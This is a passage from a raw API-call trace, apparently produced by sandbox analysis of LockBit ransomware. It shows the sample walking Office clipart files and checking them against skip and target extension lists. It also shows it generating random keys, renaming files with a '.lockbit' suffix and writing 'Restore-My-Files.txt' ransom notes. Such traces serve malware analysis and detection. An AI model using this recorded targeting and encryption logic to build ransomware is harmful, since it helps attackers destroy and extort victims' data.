| out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.915] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.915] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ff3400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26ff3400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00092_.GIF", cAlternateFileName="")) returned 1 [0100.915] lstrcmpiW (lpString1=".", lpString2="AG00092_.GIF") returned -1 [0100.915] lstrcmpiW (lpString1="..", lpString2="AG00092_.GIF") returned -1 [0100.915] PathFindExtensionW (pszPath="AG00092_.GIF") returned=".GIF" [0100.915] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.915] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.915] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.915] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.915] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.915] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.915] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.916] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.916] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.916] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.916] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.916] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.916] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="ntldr", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00092_.GIF") returned 1 [0100.917] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00092_.GIF") returned 1 [0100.917] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.917] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned=".GIF" [0100.917] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.917] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.917] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.918] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.918] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.918] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.lockbit") returned 72 [0100.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0100.919] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.919] malloc (_Size=0x40068) returned 0x3df0128 [0100.921] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=502) returned 1 [0100.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0100.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0100.927] ReadFile (in: hFile=0x3b0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 0x0 [0100.928] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.928] malloc (_Size=0xa6) returned 0x77d800 [0100.928] NtSetInformationFile (FileHandle=0x3b0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.929] free (_Block=0x77d800) [0100.929] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.929] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.929] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef57700, ftCreationTime.dwHighDateTime=0x1bd4f8b, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ef57700, ftLastWriteTime.dwHighDateTime=0x1bd4f8b, nFileSizeHigh=0x0, nFileSizeLow=0x319e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00103_.GIF", cAlternateFileName="")) returned 1 [0100.929] lstrcmpiW (lpString1=".", lpString2="AG00103_.GIF") returned -1 [0100.929] lstrcmpiW (lpString1="..", lpString2="AG00103_.GIF") returned -1 [0100.929] PathFindExtensionW (pszPath="AG00103_.GIF") returned=".GIF" [0100.929] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.929] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.929] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.929] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.929] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.929] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.929] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.929] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.929] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.930] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.930] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.931] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="ntldr", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00103_.GIF") returned 1 [0100.931] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00103_.GIF") returned 1 [0100.931] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.931] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned=".GIF" [0100.931] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.931] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.931] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.931] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.931] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.932] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.932] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.932] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.lockbit") returned 72 [0100.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e0 [0100.953] CreateIoCompletionPort (FileHandle=0x13e0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.953] malloc (_Size=0x40068) returned 0x3e30198 [0100.955] GetFileSizeEx (in: hFile=0x13e0, lpFileSize=0x3e301b0 | out: lpFileSize=0x3e301b0*=12702) returned 1 [0100.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e701cc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e701cc) returned 0x0 [0100.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e701dc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e701dc) returned 0x0 [0100.960] ReadFile (in: hFile=0x13e0, lpBuffer=0x3e301cc, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198) returned 1 [0100.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.969] malloc (_Size=0xa6) returned 0x77d800 [0100.969] NtSetInformationFile (FileHandle=0x13e0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.970] free (_Block=0x77d800) [0100.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.971] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.971] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf316a100, ftCreationTime.dwHighDateTime=0x1bd4bcc, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf316a100, ftLastWriteTime.dwHighDateTime=0x1bd4bcc, nFileSizeHigh=0x0, nFileSizeLow=0xd9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00120_.GIF", cAlternateFileName="")) returned 1 [0100.971] lstrcmpiW (lpString1=".", lpString2="AG00120_.GIF") returned -1 [0100.971] lstrcmpiW (lpString1="..", lpString2="AG00120_.GIF") returned -1 [0100.971] PathFindExtensionW (pszPath="AG00120_.GIF") returned=".GIF" [0100.971] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.971] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.971] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.971] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.971] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.972] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.972] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.973] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.973] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00120_.GIF") returned 1 [0100.973] lstrcmpiW (lpString1="ntldr", lpString2="AG00120_.GIF") returned 1 [0100.973] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00120_.GIF") returned 1 [0100.974] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00120_.GIF") returned 1 [0100.974] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00120_.GIF") returned 1 [0100.974] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00120_.GIF") returned 1 [0100.974] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00120_.GIF") returned 1 [0100.974] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.974] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned=".GIF" [0100.974] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.974] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.974] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW 